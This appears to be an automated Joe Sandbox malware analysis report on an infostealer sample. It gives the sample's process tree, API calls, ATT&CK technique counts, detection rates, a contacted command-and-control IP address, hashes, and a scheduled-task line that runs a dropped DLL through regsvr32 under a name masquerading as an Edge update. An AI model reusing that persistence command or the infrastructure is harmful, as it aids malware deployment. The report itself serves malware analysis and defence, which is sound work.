Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_6C8F26D0 ExitProcess,ProcessPrng,GetCurrentProcessId,ProcessPrng,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,ReadFileEx,SleepEx,GetLastError,7_2_6C8F26D0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_6C874C20 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,7_2_6C874C20
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 7_2_6C86F450 memset,RtlGetVersion,7_2_6C86F450
MITRE ATT&CK matrix (one line per tactic, techniques in the matrix's column order; a number in parentheses is the count shown next to that technique in the matrix):
Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise
Execution: Native API (2) | Command and Scripting Interpreter (12) | Scheduled Task/Job (1) | PowerShell (1) | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job
Persistence: DLL Side-Loading (1) | Windows Service (1) | Scheduled Task/Job (1) | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Privilege Escalation: DLL Side-Loading (1) | Windows Service (1) | Process Injection (212) | Scheduled Task/Job (1) | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job
Defense Evasion: Disable or Modify Tools (1) | Deobfuscate/Decode Files or Information (1) | Obfuscated Files or Information (3) | DLL Side-Loading (1) | Masquerading (1) | Virtualization/Sandbox Evasion (21) | Process Injection (212) | Regsvr32 (1)
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem
Discovery: System Time Discovery (1) | System Information Discovery (15) | Network Share Discovery (1) | Security Software Discovery (121) | Process Discovery (1) | Virtualization/Sandbox Evasion (21) | Application Window Discovery (1) | System Owner/User Discovery (2)
Lateral Movement: Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services
Collection: Archive Collected Data (1) | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking
Command and Control: Ingress Tool Transfer (1) | Encrypted Channel (22) | Non-Application Layer Protocol (1) | Application Layer Protocol (2) | Fallback Channels | Multiband Communication | Commonly Used Port | Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement
Behavior Graph ID: 1583995  Sample: eXIHsSYhOX.exe  Startdate: 04/01/2025  Architecture: WINDOWS  Score: 100
Start-node signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 4 other signatures
Start-node DNS: 18.31.95.13.in-addr.arpa
Process tree (graph node ids in brackets; the counters after a process name are reproduced as they appear in the graph):
  eXIHsSYhOX.exe [13] 2
    dropped: C:\Users\user\AppData\...\eXIHsSYhOX.tmp (PE32)
    eXIHsSYhOX.tmp [18] 3 3
      dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
      cmd.exe [24] 1
        eXIHsSYhOX.exe [29] 2
          dropped: C:\Users\user\AppData\...\eXIHsSYhOX.tmp (PE32)
          eXIHsSYhOX.tmp [38] 23 6
            dropped: C:\Users\user\AppData\Roaming\is-SF7GG.tmp (PE32); C:\Users\user\...\BurlySparrow.dll (copy) (PE32); C:\Users\user\AppData\...\unins000.exe (copy) (PE32); 2 other files (none is malicious)
            regsvr32.exe [41]
              network: 103.97.176.69, 443, 49736, 53050 ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK Hong Kong; 127.0.0.1 unknown unknown
              signatures: System process connects to network (likely due to code injection or exploit); Suspicious powershell command line found; Contains functionality to inject code into remote processes; Uses Register-ScheduledTask to add task schedules
              powershell.exe [45] 37
                signatures: Loading BitLocker PowerShell Module
                conhost.exe [50]
              powershell.exe [48] 37
                conhost.exe [52]
        conhost.exe [32]
        timeout.exe [34] 1
  regsvr32.exe [16]
    regsvr32.exe [21]
      signatures: Suspicious powershell command line found
      powershell.exe [26]
        signatures: Loading BitLocker PowerShell Module
        conhost.exe [36]

Source | Detection | Scanner | Label
eXIHsSYhOX.exe | 53% | Virustotal |
eXIHsSYhOX.exe | 45% | ReversingLabs | Win32.Trojan.CrypterX

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmp | 1% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmp | 1% | Virustotal |
C:\Users\user\AppData\Local\is-L5KBT.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\unins000.exe (copy) | 0% | ReversingLabs |
C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy) | 65% | ReversingLabs | Win32.Infostealer.Tinba
C:\Users\user\AppData\Roaming\is-SF7GG.tmp | 65% | ReversingLabs | Win32.Infostealer.Tinba
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
18.31.95.13.in-addr.arpa | unknown | unknown | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | eXIHsSYhOX.exe | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.1818056644.0000000005DED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1862302004.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://go.micro | regsvr32.exe, 00000007.00000003.1775901750.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889000583.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1756577607.0000000004189000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774948229.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917563598.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1888311741.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1750414268.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1772234354.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1751777281.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774741083.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1749875575.0000000004191000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000008.00000002.1809903757.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lB | powershell.exe, 00000008.00000002.1809903757.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.00000000051D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.microsoft | powershell.exe, 0000000A.00000002.1868255401.0000000006C70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1978277897.0000000003387000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.remobjects.com/ps | eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F0BB000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.tmp, 00000001.00000000.1662025483.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, eXIHsSYhOX.tmp, 00000006.00000000.1692249801.0000000000DDD000.00000020.00000001.01000000.00000006.sdmp, eXIHsSYhOX.tmp.0.dr | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000008.00000002.1809903757.0000000004ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004184000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1818056644.0000000005DED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1862302004.00000000050BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.innosetup.com/ | eXIHsSYhOX.exe, 00000000.00000003.1660219416.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.exe, 00000000.00000003.1660568722.000000007F0BB000.00000004.00001000.00020000.00000000.sdmp, eXIHsSYhOX.tmp, 00000001.00000000.1662025483.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, eXIHsSYhOX.tmp, 00000006.00000000.1692249801.0000000000DDD000.00000020.00000001.01000000.00000006.sdmp, eXIHsSYhOX.tmp.0.dr | false | | high
https://contoso.com/License | powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000011.00000002.2001806142.000000000623C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.rs/getrandom#nodejs-es-module-support | regsvr32.exe, regsvr32.exe, 0000000E.00000002.2029086598.000000006C955000.00000002.00000001.01000000.00000007.sdmp | false | | high
http://go.microsoft.c | regsvr32.exe, 00000007.00000003.1775901750.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889000583.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1759503664.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1756577607.0000000004189000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774948229.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917563598.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1888311741.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758105092.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1750414268.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1772234354.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1751777281.0000000004191000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1758205297.000000000418C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1774741083.0000000004190000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1749875575.0000000004191000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.1809903757.0000000004D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1852228572.0000000004051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1982918321.00000000051D1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
103.97.176.69 | unknown | Hong Kong | 137443 | ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | true

IP
127.0.0.1
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1583995
                                            Start date and time:2025-01-04 01:21:07 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 38s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:eXIHsSYhOX.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:9170086e8d746e094ab4fe7444613030.exe
                                            Detection:MAL
                                            Classification:mal100.evad.winEXE@26/22@1/2
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 80%
                                            • Number of executed functions: 86
                                            • Number of non-executed functions: 178
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.95.31.18, 52.149.20.212, 13.107.246.45
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 8120 because it is empty
• Not all processes were analyzed; report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenFile calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
00:22:16 | Task Scheduler | Run new task: MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3} path: regsvr32 s>/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll
19:22:08 | API Interceptor | 57x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | Hilix.ppc.elf | malicious | Mirai | 156.253.18.92
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | hcxmivKYfL.exe | malicious | RedLine | 154.91.34.250
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | loligang.arm.elf | malicious | Mirai | 154.197.40.222
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | ep0X2wemcU.exe | malicious | RedLine | 154.91.34.250
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | vcimanagement.i586.elf | malicious | Gafgyt, Mirai | 156.253.18.48
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | vcimanagement.i686.elf | malicious | Gafgyt, Mirai | 156.241.153.155
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | db0fa4b8db0333367e9bda3ab68b8042.sh4.elf | malicious | Mirai, Gafgyt | 156.236.109.76
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | db0fa4b8db0333367e9bda3ab68b8042.i686.elf | malicious | Mirai, Gafgyt | 118.193.169.219
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | armv6l.elf | malicious | Unknown | 118.193.187.249
ANCHGLOBAL-AS-APAnchnetAsiaLimitedHK | b3astmode.spc.elf | malicious | Mirai | 118.188.166.158
                                            No context
Match: C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmp
Associated Sample Name / URL | Detection | Threat Name | Context
NkMMNoILv9.exe | malicious | Unknown |
MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown |
MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown |
MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip | malicious | Unknown |
ETVk1yP43q.exe | malicious | AZORult |
Setup.exe | malicious | LummaC |
qnUFsmyxMm.exe | malicious | LummaC |
Active_Setup.exe | malicious | LummaC Stealer |
setup.exe | malicious | LummaC |
Set-up.exe | malicious | LummaC |
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):2156
                                                                Entropy (8bit):5.409696644034017
                                                                Encrypted:false
                                                                SSDEEP:48:1WSU4xympg4REoUP7gZ9tK8NPrjg7u1iMLgeRw4U2lY:1LHxveIjLZ2Kj8OLgipllY
                                                                MD5:34B7FA7083E2740AEADFE3E28DF334AF
                                                                SHA1:9395FB46AA7965316A9728BBA25B91627AA7A829
                                                                SHA-256:BA5BA0CCF9F2D0037BC29BAA7B1F9C9EF10F561AECD65C54A73B3868B1C71BD6
                                                                SHA-512:A422BCED1EBC70BCC6391E36031A3F7E87BE71D9C7F4A6818429D7172A38A9315BCE203CF327110922BC1F9BF7607A12DA5FCA6E25DB106CBF57F746298DDCF6
                                                                Malicious:false
